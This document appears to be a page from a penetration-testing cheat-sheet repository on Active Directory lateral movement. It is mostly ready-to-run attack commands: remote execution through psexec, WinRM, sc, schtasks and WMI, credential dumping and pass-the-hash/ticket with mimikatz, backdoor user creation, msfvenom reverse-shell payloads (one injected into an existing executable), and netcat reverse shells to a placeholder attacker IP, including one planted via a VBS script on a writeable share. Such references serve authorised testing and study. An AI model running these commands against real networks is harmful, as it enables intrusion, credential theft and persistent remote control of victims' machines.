whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Miscellaneous/Active Directory/lateral_movement.md

265 lines
7.4 KiB
Markdown
Raw Normal View History

restructured Misc and RevShells
2022-11-13 16:00:22 +01:00
# Lateral Movement
* Finding credentials with more permissions move through the network cloaked, avoiding detection
* Context of connections from A to B with permission C might be suspicious, therefore some bypass has to be found
* Local and network/domain accounts have to be distinguished. UAC is enforced on local admin accounts and not on domain accounts
* __Service executables need their own special reverse shell__, `msfvenom` file format `exe-service`
## Remote Processes
### psexec
* Port `445`
* `SMB` protocol
* Group membership: `Administrators`
* Upload the service binary to `ADMIN$` directory of the SMB server
* Use `psexesvc.exe` via service control manager to execute the remote process
* Communication will be established through a named pipe
```sh
psexec64.exe \\%TARGET_IP% -u Administrator -p %PASSWORD% -i cmd.exe
```
### WinRM
* Ports `5985` (HTTP) and `5986` (HTTPS)
* Group Membership: `Remote Management Users`
* Execute powershell commands on remote targets
```sh
winrs.exe -u:Administrator -p:%PASSWORD% -r:target cmd
```
* Run through powershell alternatively via
```sh
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
Enter-PSSession -Computername TARGET -Credential $credential
Invoke-Command -Computername TARGET -Credential -ScriptBlock {whoami}
```
### sc
* Ports `135`, `49152-65535` (DCE/RPC), `135` shows service endpoints on the high ports
* Ports `139` and `445`RPC over SMB named pipes, if SVCCTL fails over `135`
* Group Membership: `Administrators`
* Create service remotely via Service Control Manager (RPC) or `SVCCTL`
```sh
sc.exe \\%TARGET_IP% create MyService binPath= "net user newuser securepassword /add" start= auto
sc.exe \\%TARGET_IP% start MyService
sc.exe \\%TARGET_IP% stop MyService
sc.exe \\%TARGET_IP% delete MyService
```
### schtasks
* Create remote scheduled tasks
```sh
schtasks /s TARGET /RU "SYSTEM" /create /tn "SteamUpdateService" /tr "<command/payload to execute>" /sc ONCE /sd 01/01/1970 /st 00:00
schtasks /s TARGET /run /TN "SteamUpdateService"
```
* Delete scheduled tasks via
```sh
schtasks /S TARGET /TN "SteamUpdateService" /DELETE /F
```
### wmi
* Ports are
* DCOM `135` RPC and dynamic ports
* Wsman `5985` winrm HTTP and `5986` winrm HTTPS
* Group membership: `Administrators`
* To start, use the same object used for winrm
```sh
$username = "Administrator";
$password = "SecurePassword";
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
```
* Store the session
```sh
$Opt = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName TARGET -Credential $credential -SessionOption $Opt -ErrorAction Stop
```
* __Spawn a remote process__
```sh
$Command = "powershell.exe -Command Set-Content -Path C:\payload.txt -Value itworked";
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{
CommandLine = $Command
}
```
* Alternatively via
```sh
wmic.exe /user:Administrator /password:securepassword /node:TARGET process call create "cmd.exe /c nc64.exe -e cmd.exe %ATTACKER_IP% %ATTACKER_PORT%"
```
* __Spawn a remote service__
```sh
Invoke-CimMethod -CimSession $Session -ClassName Win32_Service -MethodName Create -Arguments @{
Name = "SteamUpdateService";
DisplayName = "SteamUpdateService";
PathName = "net user gabenewell securepassword /add";
ServiceType = [byte]::Parse("16"); # Win32OwnProcess : Start service in a new process
StartMode = "Manual"
}
```
* Initiate the service
```sh
$Service = Get-CimInstance -CimSession $Session -ClassName Win32_Service -filter "Name LIKE 'SteamUpdateService'"
Invoke-CimMethod -InputObject $Service -MethodName StartService
```
* Start and stop via
```sh
Invoke-CimMethod -InputObject $Service -MethodName StopService
Invoke-CimMethod -InputObject $Service -MethodName Delete
```
* __Spawn a remote scheduled task__
```sh
$Command = "cmd.exe"
$Args = "/c net user gabenewell securepassword /add"
$Action = New-ScheduledTaskAction -CimSession $Session -Execute $Command -Argument $Args
Register-ScheduledTask -CimSession $Session -Action $Action -User "NT AUTHORITY\SYSTEM" -TaskName "SteamUpdateService"
Start-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
```
* Delete task via
```sh
Unregister-ScheduledTask -CimSession $Session -TaskName "SteamUpdateService"
```
* __ Install a remote msi package__
```sh
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$TARGET_IP LPORT=4711 -f msi -o steam.msi
```
* Upload and run via
```sh
Invoke-CimMethod -CimSession $Session -ClassName Win32_Product -MethodName Install -Arguments @{PackageLocation = "C:\Windows\steam.msi"; Options = ""; AllUsers = $false}
```
* Alternatively on older systems via
```sh
wmic /node:TARGET /user:DOMAIN\USER product call install PackageLocation=c:\Windows\steam.msi
```
## Further Authentication Methods
* NTLM
* Kerberos
### NTLM
#### __Pass the hash__
* Retrieve and pass a hash generated from the password
* Use mimikatz on local SAM
```sh
privilege::debug
token::elevate
lsadump::sam
```
* Use mimikatz on lsass
```sh
privilege::debug
token::elevate
sekurlsa::msv
```
* Open reverse shell via mimikatz
```sh
token::revert
sekurlsa::pth /user:<username>
/domain:<domainname> /ntlm:<hash> /run:"C:\Windows\temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"
```
* Via RDP
```sh
xfreerdp /v:$TARGET_IP /u:DOMAIN\\<username> /pth:<ntlm-hash>
```
* Via psexec
```sh
psexec.py -hashes <ntlm-hash> DOMAIN/<username>@%TARGET_IP%
```
* Kerberos
```sh
evil-winrm -i $TARGET_IP -u <username> -H <ntlm-hash>
```
### Kerberos
* Ticket and session key are needed
#### Pass The Ticket
* Extract via mimikatz
```sh
privilege::debug
sekurlsa::tickets /export
```
* TGS need low privilege account, TGT need administrative privileges
* Use the ticket to inject into a current session
```sh
kerberos::ptt <ticket>@<domain>.kirbi
```
* Check tickets via `klist`
#### Overpass The Hash
* Pass the key: Timestamp to gain TGT is encrypted via an encrypted key
* Algorithms can be `rc4`, `aes128`, `aes256` or `des` if enabled
* `rc4` is a pure ntml hash
* Use the key to gain the TGT
```sh
privilege::debug
sekurlsa::ekeys
```
* Open a reverse shell via
```sh
sekurlsa::pth /user:Administrator /domain:<domain> /<hash-algorithm>:<hash> /run:"C:\Windows\Temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711"
```
## Writeable Shares
* Find a shortcut, a script or anything that keeps a connection over the network to a share
* Reuse a `*.vbs` via
```sh
CreateObject("WScript.Shell").Run "cmd.exe /c copy /Y \\%TARGET_IP%\share\nc.exe %tmp% & %tmp%\nc.exe -e cmd.exe %ATTACKER_IP% 4711", 0, True
```
* Reuse and inject into exisiting portable executable
```sh
msfvenom -a x64 --platform windows -x <reused.exe> -k -p windows/meterpreter/reverse_tcp LHOST=$ATTACKER_IP LPORT=4711 -b "\x00" -f exe -o <new_reused.exe>
```
* Reuse RDP session. Administrator can be logged out but did not close the session. Reuse it without a password as administrator user. Therefore run `cmd` or `powershell` as administrator and reuse the session by its name
```sh
PsExec64.exe -s cmd.exe
query user
```
* Check output and fill in
```sh
tscon <ID-of-target> /dest:<my-SESSIONNAME>
```
* Session state should be `DISC`, a session which was not exited correctly
* Windows Server < 2019 only without the password